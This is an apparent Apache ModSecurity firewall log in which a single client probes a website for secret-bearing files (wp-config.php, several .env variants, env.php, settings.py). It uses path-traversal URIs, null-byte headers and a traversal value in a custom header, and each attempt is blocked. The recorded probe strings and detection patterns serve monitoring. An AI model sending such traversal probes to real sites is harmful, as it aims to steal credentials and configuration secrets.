[Tue May 12 06:16:29.644801 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnBfeipD4uoG21Fo_1QAAAAU"]
[Tue May 12 06:16:29.678742 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpnRfeipD4uoG21Fo_2AAAAAU"]
[Tue May 12 06:16:29.678823 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpnRfeipD4uoG21Fo_2AAAAAU"]
[Tue May 12 06:16:29.679015 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpnRfeipD4uoG21Fo_2AAAAAU"]
[Tue May 12 06:16:30.514133 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnRfeipD4uoG21Fo_1wAAAAI"]
[Tue May 12 06:16:30.514838 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnRs7kySIUZ3ORnI1SAAAARE"]
[Tue May 12 06:16:30.538178 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpnhfeipD4uoG21Fo_2QAAAAI"]
[Tue May 12 06:16:30.538382 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpnhfeipD4uoG21Fo_2QAAAAI"]
[Tue May 12 06:16:30.543917 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnhs7kySIUZ3ORnI1SgAAARE"]
[Tue May 12 06:16:30.543963 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnhs7kySIUZ3ORnI1SgAAARE"]
[Tue May 12 06:16:30.543990 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnhs7kySIUZ3ORnI1SgAAARE"]
[Tue May 12 06:16:30.544558 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnhs7kySIUZ3ORnI1SgAAARE"]
[Tue May 12 06:16:30.721853 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnRfeipD4uoG21Fo_2AAAAAU"]
[Tue May 12 06:16:30.745125 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpnhfeipD4uoG21Fo_2wAAAAU"]
[Tue May 12 06:16:30.745333 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpnhfeipD4uoG21Fo_2wAAAAU"]
[Tue May 12 06:16:31.218513 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnhfeipD4uoG21Fo_2QAAAAI"]
[Tue May 12 06:16:31.234045 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnhs7kySIUZ3ORnI1SgAAARE"]
[Tue May 12 06:16:31.243953 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpnxfeipD4uoG21Fo_3AAAAAI"]
[Tue May 12 06:16:31.244169 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpnxfeipD4uoG21Fo_3AAAAAI"]
[Tue May 12 06:16:31.457816 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.457883 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.457931 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.458141 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.458190 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.458218 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.458605 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.622980 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnhfeipD4uoG21Fo_2wAAAAU"]
[Tue May 12 06:16:31.648071 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpnxfeipD4uoG21Fo_3QAAAAU"]
[Tue May 12 06:16:31.648264 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpnxfeipD4uoG21Fo_3QAAAAU"]
[Tue May 12 06:16:31.929990 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnxfeipD4uoG21Fo_3AAAAAI"]
[Tue May 12 06:16:31.932996 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnxs7kySIUZ3ORnI1SwAAARE"]
[Tue May 12 06:16:31.954947 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKpnxfeipD4uoG21Fo_3wAAAAI"]
[Tue May 12 06:16:31.955170 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKpnxfeipD4uoG21Fo_3wAAAAI"]
[Tue May 12 06:16:31.962360 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:31.962400 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:31.962429 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKpnxs7kySIUZ3ORnI1TgAAARE"]
[Tue May 12 06:16:31.962612 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] 